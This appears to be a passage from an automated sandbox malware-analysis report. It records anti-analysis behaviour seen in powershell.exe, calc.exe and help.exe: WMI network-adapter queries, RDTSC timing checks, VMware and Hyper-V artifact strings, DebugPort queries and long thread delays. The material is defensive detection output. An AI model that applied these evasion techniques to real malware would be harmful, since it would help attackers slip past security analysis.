          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\SysWOW64\calc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\calc.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000001A98E4 second address: 00000000001A98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000001A9B4E second address: 00000000001A9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00409A80 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4706
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4066
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3556Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5884Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\SysWOW64\help.exe TID: 4732Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 0000000A.00000000.303017451.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 0000000A.00000000.320295522.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000A.00000000.280926242.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 0000000A.00000000.303675861.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 0000000A.00000000.329155939.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000000A.00000000.303675861.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 0000000A.00000000.301912777.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\calc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_00409A80 rdtsc
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0040ACC0 LdrLoadDll,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03478B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033ADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0346131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033ADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0345D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0346138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03475BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03434257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0345B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0345B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03478A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_034251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03471074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03462073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03474015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03474015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03427016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03427016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03427016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03423884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03423884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03478F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0347070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0347070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0343FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033BEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033E37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03427794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03427794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03427794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033D8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_03461608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_0345FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\calc.exeCode function: 9_2_033B7E41 mov eax, dword ptr fs:[00000030h]
